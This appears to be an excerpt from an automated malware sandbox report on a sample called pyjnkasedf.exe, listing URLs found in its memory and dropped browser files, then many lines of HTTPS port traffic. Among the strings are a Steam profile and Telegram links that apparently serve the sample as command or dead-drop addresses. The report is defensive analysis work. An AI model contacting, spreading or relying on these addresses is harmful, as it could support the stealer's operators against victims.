            Source: 000003.log6.15.drString found in binary or memory: https://ntp.msn.com/
            Source: 000003.log6.15.drString found in binary or memory: https://ntp.msn.com/0
            Source: QuotaManager.15.drString found in binary or memory: https://ntp.msn.com/_default
            Source: 2cc80dabc69f58b6_1.15.dr, 000003.log6.15.drString found in binary or memory: https://ntp.msn.com/edge/ntp
            Source: 000003.log6.15.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
            Source: Session_13377476316023527.15.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
            Source: QuotaManager.15.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
            Source: 2cc80dabc69f58b6_0.15.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://open.spotify.com
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://outlook.live.com/mail/0/
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://outlook.office.com/mail/0/
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
            Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://sb.scorecardresearch.com/
            Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://srtb.msn.cn/
            Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://srtb.msn.com/
            Source: pyjnkasedf.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199803837316
            Source: pyjnkasedf.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199803837316g88paMozilla/5.0
            Source: pyjnkasedf.exe, 00000000.00000002.2028055481.0000000003EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: pyjnkasedf.exe, 00000000.00000002.2028055481.0000000003EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: pyjnkasedf.exe, 00000000.00000002.2023659585.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
            Source: pyjnkasedf.exeString found in binary or memory: https://t.me/gv4dlp
            Source: pyjnkasedf.exeString found in binary or memory: https://t.me/gv4dlpg88paMozilla/5.0
            Source: pyjnkasedf.exe, 00000000.00000003.1288702655.0000000000945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/gv4dlpx
            Source: pyjnkasedf.exe, 00000000.00000002.2023659585.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/tlt
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://tidal.com/
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://twitter.com/
            Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
            Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
            Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://vibe.naver.com/today
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
            Source: pyjnkasedf.exe, 00000000.00000003.1288580511.0000000000945000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1363743544.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1410242724.000000000093D000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000003.1386748525.000000000093E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmp, pyjnkasedf.exe, 00000000.00000003.1340492383.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://web.telegram.org/
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://web.whatsapp.com
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
            Source: pyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, HIDHIE.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.deezer.com/
            Source: pyjnkasedf.exe, 00000000.00000002.2024724146.0000000003642000.00000004.00000020.00020000.00000000.sdmp, IDBKFH.0.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: content.js.15.dr, content_new.js.15.drString found in binary or memory: https://www.google.com/chrome
            Source: pyjnkasedf.exe, 00000000.00000002.2025435836.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2024724146.0000000003642000.00000004.00000020.00020000.00000000.sdmp, AFHDHC.0.dr, Web Data.15.dr, IDBKFH.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: e4931ed2-fe5c-4f76-8ed2-50603fc61b68.tmp.16.dr, 4dc7e5a3-b915-4af4-a840-9d0cb873b8e0.tmp.16.drString found in binary or memory: https://www.googleapis.com
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.iheart.com/podcast/
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.instagram.com
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.last.fm/
            Source: pyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, HIDHIE.0.drString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.messenger.com
            Source: pyjnkasedf.exe, 00000000.00000002.2028055481.0000000003EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
            Source: pyjnkasedf.exe, 00000000.00000002.2028055481.0000000003EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
            Source: pyjnkasedf.exe, 00000000.00000002.2028055481.0000000003EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: pyjnkasedf.exe, 00000000.00000002.2028055481.0000000003EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: pyjnkasedf.exe, 00000000.00000002.2028055481.0000000003EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.office.com
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.tiktok.com/
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://www.youtube.com
            Source: 1c7bcad5-c2b8-4937-ba78-03e856d3af23.tmp.15.drString found in binary or memory: https://y.music.163.com/m/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
            Source: unknownNetwork traffic detected: HTTP traffic on port 62217 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62195 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
            Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
            Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
            Source: unknownNetwork traffic detected: HTTP traffic on port 62240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
            Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
            Source: unknownNetwork traffic detected: HTTP traffic on port 62241 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
            Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
            Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62229 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
            Source: unknownNetwork traffic detected: HTTP traffic on port 62251 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62227 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
            Source: unknownNetwork traffic detected: HTTP traffic on port 62250 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
            Source: unknownNetwork traffic detected: HTTP traffic on port 62205 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
